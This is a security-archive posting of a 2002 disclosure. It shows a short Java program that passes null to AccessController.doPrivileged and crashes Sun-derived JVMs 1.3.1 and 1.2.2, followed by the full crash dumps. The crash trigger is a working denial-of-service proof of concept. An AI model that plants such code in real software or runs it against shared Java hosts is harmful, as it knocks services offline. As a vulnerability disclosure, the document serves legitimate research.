exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

jvmcrash.txt

jvmcrash.txt
Posted Feb 2, 2002
Authored by Taeho Oh

java.security.AccessController can cause Sun derived JVM to crash. Tested on v1.3.1. Article available here.

tags | java
SHA-256 | d54b65e6f002a4b975ed045bad4a8fcda3b0d5fb0f199835727b51f75d88aaa0
Download | Favorite | View

jvmcrash.txt

Change Mirror Download
java.security.AccessController can cause Sun derived JVM to crash.

------------------------------------------------------------
[ ohhara@xxxxxxxx ~/crash ] {1} $ ls -al
total 8
drwxr-xr-x    2 ohhara   vm             63 Jan 30 14:42 ./
drwxr-xr-x   18 ohhara   vm           3024 Jan 30 14:41 ../
-rw-r--r--    1 ohhara   vm            171 Jan 30 14:41 CrashMe.java
[ ohhara@xxxxxxxx ~/crash ] {2} $ cat CrashMe.java
public class CrashMe
{
    public static void main(String[] args)
    {
        java.security.AccessController.doPrivileged((java.security.PrivilegedAction)null);
    }
}
[ ohhara@xxxxxxxx ~/crash ] {3} $ /usr/local/jdk1.3.1/bin/javac CrashMe.java
[ ohhara@xxxxxxxx ~/crash ] {4} $ /usr/local/jdk1.3.1/bin/java CrashMe

Unexpected Signal : 11 occurred at PC=0x4014f743
Function name=JVM_DoPrivileged
Library=/usr/local/jdk1.3.1/jre/lib/i386/client/libjvm.so

Current Java thread:
        at java.security.AccessController.doPrivileged(Native Method)
        at CrashMe.main(CrashMe.java:5)

Dynamic libraries:
08048000-0804c000 r-xp 00000000 03:08 110669     /usr/local/jdk1.3.1/bin/i386/native_threads/java
0804c000-0804d000 rw-p 00003000 03:08 110669     /usr/local/jdk1.3.1/bin/i386/native_threads/java
40000000-40013000 r-xp 00000000 03:01 24         /lib/ld-2.2.3.so
40013000-40014000 rw-p 00012000 03:01 24         /lib/ld-2.2.3.so
40015000-40023000 r-xp 00000000 03:01 69         /lib/libpthread-0.9.so
40023000-4002b000 rw-p 0000d000 03:01 69         /lib/libpthread-0.9.so
4002b000-40036000 r-xp 00000000 03:08 110505     /usr/local/jdk1.3.1/jre/lib/i386/native_threads/libhpi.so
40036000-40037000 rw-p 0000a000 03:08 110505     /usr/local/jdk1.3.1/jre/lib/i386/native_threads/libhpi.so
40038000-402fb000 r-xp 00000000 03:08 110513     /usr/local/jdk1.3.1/jre/lib/i386/client/libjvm.so
402fb000-40312000 rw-p 002c2000 03:08 110513     /usr/local/jdk1.3.1/jre/lib/i386/client/libjvm.so
4032a000-4032d000 r-xp 00000000 03:01 37         /lib/libdl-2.2.3.so
4032d000-4032e000 rw-p 00002000 03:01 37         /lib/libdl-2.2.3.so
4032e000-4043b000 r-xp 00000000 03:01 33         /lib/libc-2.2.3.so
4043b000-40442000 rw-p 0010c000 03:01 33         /lib/libc-2.2.3.so
40446000-40447000 r-xp 00000000 03:01 26         /lib/libBrokenLocale-2.2.3.so
40447000-40448000 rw-p 00000000 03:01 26         /lib/libBrokenLocale-2.2.3.so
40448000-4045a000 r-xp 00000000 03:01 42         /lib/libnsl-2.2.3.so
4045a000-4045c000 rw-p 00011000 03:01 42         /lib/libnsl-2.2.3.so
4045e000-40480000 r-xp 00000000 03:01 39         /lib/libm-2.2.3.so
40480000-40481000 rw-p 00021000 03:01 39         /lib/libm-2.2.3.so
40482000-40494000 r-xp 00000000 03:08 110516     /usr/local/jdk1.3.1/jre/lib/i386/libverify.so
40494000-40496000 rw-p 00011000 03:08 110516     /usr/local/jdk1.3.1/jre/lib/i386/libverify.so
40496000-404b9000 r-xp 00000000 03:08 110517     /usr/local/jdk1.3.1/jre/lib/i386/libjava.so
404b9000-404bb000 rw-p 00022000 03:08 110517     /usr/local/jdk1.3.1/jre/lib/i386/libjava.so
404bc000-404d1000 r-xp 00000000 03:08 110518     /usr/local/jdk1.3.1/jre/lib/i386/libzip.so
404d1000-404d4000 rw-p 00014000 03:08 110518     /usr/local/jdk1.3.1/jre/lib/i386/libzip.so
404d4000-411ed000 r--s 00000000 03:08 110584     /usr/local/jdk1.3.1/jre/lib/rt.jar
4121a000-414bf000 r--s 00000000 03:08 110585     /usr/local/jdk1.3.1/jre/lib/i18n.jar
414bf000-414d5000 r--s 00000000 03:08 110536     /usr/local/jdk1.3.1/jre/lib/sunrsasign.jar
4357d000-4357e000 r--p 00000000 03:08 557        /usr/lib/locale/en_US/LC_IDENTIFICATION
4357e000-4357f000 r--p 00000000 03:08 558        /usr/lib/locale/en_US/LC_MEASUREMENT
4357f000-43580000 r--p 00000000 03:08 562        /usr/lib/locale/en_US/LC_TELEPHONE
495df000-495e0000 r--p 00000000 03:08 556        /usr/lib/locale/en_US/LC_ADDRESS
495e0000-495e1000 r--p 00000000 03:08 560        /usr/lib/locale/en_US/LC_NAME
495e1000-495e2000 r--p 00000000 03:08 561        /usr/lib/locale/en_US/LC_PAPER
495e2000-495e3000 r--p 00000000 03:08 1554       /usr/lib/locale/en_US/LC_MESSAGES/SYS_LC_MESSAGES
495e3000-495e4000 r--p 00000000 03:08 770        /usr/lib/locale/en_US/LC_MONETARY
495e4000-495ea000 r--p 00000000 03:08 1551       /usr/lib/locale/en_US/LC_COLLATE
495ea000-495eb000 r--p 00000000 03:08 563        /usr/lib/locale/en_US/LC_TIME
495eb000-495ec000 r--p 00000000 03:08 1223       /usr/lib/locale/en_US/LC_NUMERIC
495ec000-49607000 r--p 00000000 03:08 1646       /usr/lib/locale/en_US/LC_CTYPE
49607000-49611000 r-xp 00000000 03:01 63         /lib/libnss_nis-2.2.3.so
49611000-49612000 rw-p 00009000 03:01 63         /lib/libnss_nis-2.2.3.so
49612000-4961b000 r-xp 00000000 03:01 58         /lib/libnss_files-2.2.3.so
4961b000-4961c000 rw-p 00008000 03:01 58         /lib/libnss_files-2.2.3.so

Local Time = Wed Jan 30 14:44:10 2002
Elapsed Time = 0
#
# HotSpot Virtual Machine Error : 11
# Error ID : 4F530E43505002CC
# Please report this error at
# http://java.sun.com/cgi-bin/bugreport.cgi
#
# Java VM: Java HotSpot(TM) Client VM (Blackdown-1.3.1-FCS mixed mode)
#
# An error report file has been saved as hs_err_pid27650.log.
# Please refer to the file for further information.
#
Abort (core dumped)
[ ohhara@xxxxxxxx ~/crash ] {5} $ /usr/local/jdk1.2.2/bin/java CrashMe
SIGSEGV   11*  segmentation violation
    si_signo [11]: SIGSEGV   11*  segmentation violation
    si_errno [0]: Success
    si_code [1]: SEGV_MAPERR [addr: 0x4]

        stackpointer=0xbfffee94

Full thread dump Classic VM (Linux_JDK_1.2.2_FCS, native threads):
    "Finalizer" (TID:0x40eaa320, sys_thread_t:0x80d5fe0, state:CW, native ID:0xc04) prio=8
        at java.lang.Object.wait(Native Method)
        at java.lang.ref.ReferenceQueue.remove(ReferenceQueue.java:112)
        at java.lang.ref.ReferenceQueue.remove(ReferenceQueue.java:127)
        at java.lang.ref.Finalizer$FinalizerThread.run(Finalizer.java:174)
    "Reference Handler" (TID:0x40eaa3b0, sys_thread_t:0x80d0dd8, state:CW, native ID:0x803) prio=10
        at java.lang.Object.wait(Native Method)
        at java.lang.Object.wait(Object.java:424)
        at java.lang.ref.Reference$ReferenceHandler.run(Reference.java:114)
    "SIGQUIT handler" (TID:0x40eaa3e0, sys_thread_t:0x80d0768, state:R, native ID:0x402) prio=5
    "main" (TID:0x40eaa1e0, sys_thread_t:0x8053580, state:R, native ID:0x400) prio=5
        at java.security.AccessController.doPrivileged(Native Method)
        at CrashMe.main(CrashMe.java, Compiled Code)
Monitor Cache Dump:
    java.lang.ref.ReferenceQueue$Lock@40EAA338/40EE0028: <unowned>
        Waiting to be notified:
            "Finalizer" (0x80d5fe0)
    java.lang.ref.Reference$Lock@40EAA3C0/40EDFB20: <unowned>
        Waiting to be notified:
            "Reference Handler" (0x80d0dd8)
Registered Monitor Dump:
    PCMap lock: <unowned>
    utf8 hash table: <unowned>
    JNI pinning lock: <unowned>
    JNI global reference lock: <unowned>
    BinClass lock: <unowned>
    Class linking lock: <unowned>
    System class loader lock: <unowned>
    Code rewrite lock: <unowned>
    Heap lock: <unowned>
    Monitor cache lock: owner "main" (0x8053580) 1 entry
    Thread queue lock: owner "main" (0x8053580) 1 entry
    Monitor registry: owner "main" (0x8053580) 1 entry

[ ohhara@xxxxxxxx ~/crash ] {6} $ /usr/local/jdk1.3.1/bin/java -version
java version "1.3.1"
Java(TM) 2 Runtime Environment, Standard Edition (build Blackdown-1.3.1-FCS)
Java HotSpot(TM) Client VM (build Blackdown-1.3.1-FCS, mixed mode)
[ ohhara@xxxxxxxx ~/crash ] {7} $ /usr/local/jdk1.2.2/bin/java -version
java version "1.2.2"
Classic VM (build Linux_JDK_1.2.2_FCS, native threads, sunwjit)
[ ohhara@xxxxxxxx ~/tmp/crash ] {8} $ uname -a
Linux xxxxxxxx.alticast.com 2.4.9-2mz #1 È­ 8¿ù 28 11:50:06 KST 2001 i686 unknown
[ ohhara@xxxxxxxx ~/tmp/crash ] {9} $ 
------------------------------------------------------------

--
Taeho Oh ( ohhara@alticast.com, ohhara@postech.edu )  http://ohhara.sarang.net
Alticast                                               http://www.alticast.com
Postech ( Pohang University of Science and Technology ) http://www.postech.edu
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close